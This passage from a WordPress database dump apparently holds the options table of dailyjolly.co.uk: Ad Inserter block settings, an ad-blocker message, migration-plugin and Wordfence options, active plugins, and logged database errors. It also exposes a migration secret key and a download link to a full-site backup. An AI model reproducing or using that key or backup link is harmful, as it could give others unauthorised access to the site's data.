Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:12;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 12\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:13;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 13\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:14;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 14\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:15;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 15\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}i:16;a:78:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:8:\"Block 16\";s:8:\"tracking\";s:1:\"0\";s:12:\"display_type\";i:0;s:16:\"paragraph_number\";s:1:\"1\";s:14:\"min_paragraphs\";s:0:\"\";s:15:\"min_words_above\";s:0:\"\";s:9:\"min_words\";s:0:\"\";s:9:\"max_words\";s:0:\"\";s:19:\"min_paragraph_words\";s:0:\"\";s:19:\"max_paragraph_words\";s:0:\"\";s:23:\"count_inside_blockquote\";s:1:\"0\";s:14:\"paragraph_tags\";s:1:\"p\";s:22:\"avoid_paragraphs_above\";s:0:\"\";s:22:\"avoid_paragraphs_below\";s:0:\"\";s:16:\"avoid_text_above\";s:0:\"\";s:16:\"avoid_text_below\";s:0:\"\";s:12:\"avoid_action\";s:21:\"try to shift position\";s:15:\"avoid_try_limit\";s:1:\"1\";s:15:\"avoid_direction\";s:20:\"below and then above\";s:14:\"excerpt_number\";s:0:\"\";s:11:\"filter_type\";i:0;s:15:\"inverted_filter\";s:1:\"0\";s:14:\"direction_type\";s:8:\"From Top\";s:14:\"alignment_type\";i:0;s:11:\"general_tag\";s:0:\"\";s:10:\"scheduling\";i:0;s:10:\"after_days\";s:0:\"\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"fallback\";s:0:\"\";s:16:\"adb-block-action\";i:0;s:21:\"adb-block-replacement\";s:0:\"\";s:18:\"maximum_insertions\";s:0:\"\";s:7:\"id_list\";s:0:\"\";s:12:\"id_list_type\";s:10:\"Black List\";s:8:\"url_list\";s:0:\"\";s:13:\"url_list_type\";s:10:\"Black List\";s:18:\"url_parameter_list\";s:0:\"\";s:23:\"url_parameter_list_type\";s:10:\"Black List\";s:11:\"domain_list\";s:0:\"\";s:16:\"domain_list_type\";s:10:\"Black List\";s:15:\"ip_address_list\";s:0:\"\";s:20:\"ip_address_list_type\";s:10:\"Black List\";s:12:\"country_list\";s:0:\"\";s:17:\"country_list_type\";s:10:\"Black List\";s:13:\"category_list\";s:0:\"\";s:18:\"category_list_type\";s:10:\"Black List\";s:8:\"tag_list\";s:0:\"\";s:13:\"tag_list_type\";s:10:\"Black List\";s:13:\"taxonomy_list\";s:0:\"\";s:18:\"taxonomy_list_type\";s:10:\"Black List\";s:16:\"display_on_posts\";s:1:\"1\";s:16:\"display_on_pages\";s:1:\"0\";s:19:\"display_on_homepage\";s:1:\"0\";s:25:\"display_on_category_pages\";s:1:\"0\";s:23:\"display_on_search_pages\";s:1:\"0\";s:24:\"display_on_archive_pages\";s:1:\"0\";s:11:\"enable_ajax\";s:1:\"1\";s:11:\"enable_feed\";s:1:\"0\";s:22:\"enabled_on_which_pages\";i:0;s:22:\"enabled_on_which_posts\";i:0;s:15:\"enable_php_call\";s:1:\"0\";s:13:\"enable_widget\";s:1:\"1\";s:14:\"paragraph_text\";s:0:\"\";s:19:\"paragraph_text_type\";s:14:\"do not contain\";s:10:\"custom_css\";s:0:\"\";s:17:\"display_for_users\";s:9:\"all users\";s:18:\"detect_client_side\";s:1:\"0\";s:17:\"detect_viewport_1\";s:1:\"0\";s:17:\"detect_viewport_2\";s:1:\"0\";s:17:\"detect_viewport_3\";s:1:\"0\";}s:1:\"h\";a:8:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:6:\"HEADER\";}s:1:\"f\";a:8:{s:4:\"code\";s:0:\"\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:6:\"FOOTER\";}s:1:\"a\";a:8:{s:4:\"code\";s:227:\"<p><strong>Blocked because of Ad Blocker</strong></p>\r\n<p>It seems that you are using some ad blocking software which is preventing the page from fully loading. Please whitelist this website or disable ad blocking software.</p>\";s:11:\"process_php\";s:1:\"0\";s:13:\"enable_manual\";s:1:\"0\";s:10:\"enable_amp\";s:1:\"0\";s:10:\"enable_404\";s:1:\"0\";s:18:\"detect_server_side\";s:1:\"0\";s:19:\"display_for_devices\";s:7:\"desktop\";s:4:\"name\";s:19:\"AD BLOCKING MESSAGE\";}s:6:\"global\";a:38:{s:24:\"SYNTAX_HIGHLIGHTER_THEME\";s:11:\"ad_inserter\";s:12:\"VIEWPORT_CSS\";s:564:\".ai-viewport-3                { display: none !important;}\n.ai-viewport-2                { display: none !important;}\n.ai-viewport-1                { display: inherit !important;}\n.ai-viewport-0                { display: none !important;}\n@media (min-width: 768px) and (max-width: 979px) {\n.ai-viewport-1                { display: none !important;}\n.ai-viewport-2                { display: inherit !important;}\n}\n@media (max-width: 767px) {\n.ai-viewport-1                { display: none !important;}\n.ai-viewport-3                { display: inherit !important;}\n}\n\";s:7:\"VERSION\";s:6:\"020205\";s:16:\"BLOCK_CLASS_NAME\";s:10:\"code-block\";s:17:\"MINIMUM_USER_ROLE\";s:13:\"administrator\";s:18:\"STICKY_WIDGET_MODE\";i:0;s:20:\"STICKY_WIDGET_MARGIN\";i:15;s:15:\"PLUGIN_PRIORITY\";i:99999;s:14:\"DYNAMIC_BLOCKS\";i:0;s:28:\"PARAGRAPH_COUNTING_FUNCTIONS\";i:0;s:28:\"NO_PARAGRAPH_COUNTING_INSIDE\";s:22:\"blockquote, figure, li\";s:10:\"ADB_ACTION\";i:0;s:16:\"ADB_DELAY_ACTION\";s:0:\"\";s:20:\"ADB_NO_ACTION_PERIOD\";i:30;s:13:\"ADB_SELECTORS\";s:0:\"\";s:20:\"ADB_REDIRECTION_PAGE\";i:0;s:26:\"ADB_CUSTOM_REDIRECTION_URL\";s:0:\"\";s:15:\"ADB_OVERLAY_CSS\";s:32:\"background: #000; opacity: 0.85;\";s:15:\"ADB_MESSAGE_CSS\";s:72:\"width: 300px; padding: 10px; border: 5px solid #f00; border-radius: 5px;\";s:25:\"ADB_UNDISMISSIBLE_MESSAGE\";s:1:\"0\";s:23:\"ADMIN_TOOLBAR_DEBUGGING\";s:1:\"1\";s:16:\"REMOTE_DEBUGGING\";s:1:\"0\";s:20:\"JAVASCRIPT_DEBUGGING\";s:1:\"0\";s:15:\"VIEWPORT_NAME_1\";s:7:\"Desktop\";s:16:\"VIEWPORT_WIDTH_1\";i:980;s:15:\"VIEWPORT_NAME_2\";s:6:\"Tablet\";s:16:\"VIEWPORT_WIDTH_2\";i:768;s:15:\"VIEWPORT_NAME_3\";s:5:\"Phone\";s:16:\"VIEWPORT_WIDTH_3\";i:0;s:14:\"HOOK_ENABLED_1\";s:1:\"0\";s:11:\"HOOK_NAME_1\";s:0:\"\";s:13:\"HOOK_ACTION_1\";s:0:\"\";s:15:\"HOOK_PRIORITY_1\";i:10;s:14:\"HOOK_ENABLED_2\";s:1:\"0\";s:11:\"HOOK_NAME_2\";s:0:\"\";s:13:\"HOOK_ACTION_2\";s:0:\"\";s:15:\"HOOK_PRIORITY_2\";i:10;s:9:\"TIMESTAMP\";i:1509641475;}s:7:\"extract\";a:10:{s:11:\"used_blocks\";i:4;s:12:\"content_hook\";a:10:{i:0;a:2:{i:0;i:2;i:1;i:3;}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:2:{i:0;i:2;i:1;i:3;}i:2;a:2:{i:0;i:2;i:1;i:3;}i:7;a:0:{}i:8;a:0:{}i:10;a:2:{i:0;i:2;i:1;i:3;}}s:12:\"excerpt_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:15:\"loop_start_hook\";a:10:{i:0;a:1:{i:0;i:1;}i:3;a:1:{i:0;i:1;}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:1:{i:0;i:1;}i:2;a:1:{i:0;i:1;}i:7;a:0:{}i:8;a:0:{}i:10;a:1:{i:0;i:1;}}s:13:\"loop_end_hook\";a:10:{i:0;a:1:{i:0;i:4;}i:3;a:1:{i:0;i:4;}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:1:{i:0;i:4;}i:2;a:1:{i:0;i:4;}i:7;a:0:{}i:8;a:0:{}i:10;a:1:{i:0;i:4;}}s:13:\"the_post_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:20:\"before_comments_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:21:\"between_comments_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:19:\"after_comments_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}s:14:\"wp_footer_hook\";a:10:{i:0;a:0:{}i:3;a:0:{}i:4;a:0:{}i:6;a:0:{}i:5;a:0:{}i:1;a:0:{}i:2;a:0:{}i:7;a:0:{}i:8;a:0:{}i:10;a:0:{}}}}','yes'),(218483,'ai1wm_secret_key','CQhq9qvhy27t','yes'),(218484,'ai1wm_status','a:2:{s:4:\"type\";s:8:\"download\";s:7:\"message\";s:337:\"<a href=\"http://www.dailyjolly.co.uk/wp-content/ai1wm-backups/www.dailyjolly.co.uk-20201008-120254-5mwszr.wpress\" class=\"ai1wm-button-green ai1wm-emphasize ai1wm-button-download\" title=\"www.dailyjolly.co.uk\" download=\"www.dailyjolly.co.uk-20201008-120254-5mwszr.wpress\"><span>Download www.dailyjolly.co.uk</span><em>Size: 116 MB</em></a>\";}','yes'),(218725,'ai1wm_updater','a:0:{}','yes'),(262353,'widget_custom_html','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(277178,'wordfence_ls_version','1.0.9','yes'),(277179,'wfls_last_role_change','1649844640','no'),(277180,'wordfence_version','7.5.9','yes'),(277181,'wordfence_case','1','yes'),(277182,'wordfence_installed','1','yes'),(277183,'wordfenceActivated','1','yes'),(277184,'active_plugins','a:10:{i:0;s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";i:1;s:39:\"disable-gutenberg/disable-gutenberg.php\";i:2;s:9:\"hello.php\";i:3;s:35:\"insert-headers-and-footers/ihaf.php\";i:4;s:27:\"redirection/redirection.php\";i:5;s:23:\"wordfence/wordfence.php\";i:6;s:24:\"wordpress-seo/wp-seo.php\";i:7;s:23:\"wp-cerber/wp-cerber.php\";i:8;s:35:\"wp-fastest-cache/wpFastestCache.php\";i:9;s:23:\"wp-smushit/wp-smush.php\";}','yes'),(277185,'wf_plugin_act_error','','yes'),(277194,'_cerber_db_errors','a:7:{i:0;a:3:{i:0;s:51:\"Table \'dailyjollycouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:73:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"_nexus_mode\" AND the_id = 0\";i:2;d:1624621585.954538;}i:1;a:3:{i:0;s:51:\"Table \'dailyjollycouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:74:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_notice\" AND the_id = 0\";i:2;d:1624621585.968074;}i:2;a:3:{i:0;s:51:\"Table \'dailyjollycouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:101:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_notice\",0,\"a:0:{}\",0)\";i:2;d:1624621585.968173;}i:3;a:3:{i:0;s:51:\"Table \'dailyjollycouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:75:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"admin_message\" AND the_id = 0\";i:2;d:1624621585.968245;}i:4;a:3:{i:0;s:51:\"Table \'dailyjollycouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:102:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES (\"admin_message\",0,\"a:0:{}\",0)\";i:2;d:1624621585.968353;}i:5;a:3:{i:0;s:51:\"Table \'dailyjollycouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:79:\"SELECT * FROM wp_cerber_sets WHERE the_key = \"cerber_admin_wide\" AND the_id = 0\";i:2;d:1624621585.96846;}i:6;a:3:{i:0;s:51:\"Table \'dailyjollycouk.wp_cerber_sets\' doesn\'t exist\";i:1;s:100:\"INSERT INTO wp_cerber_sets (the_key, the_id, the_value, expires) VALUES 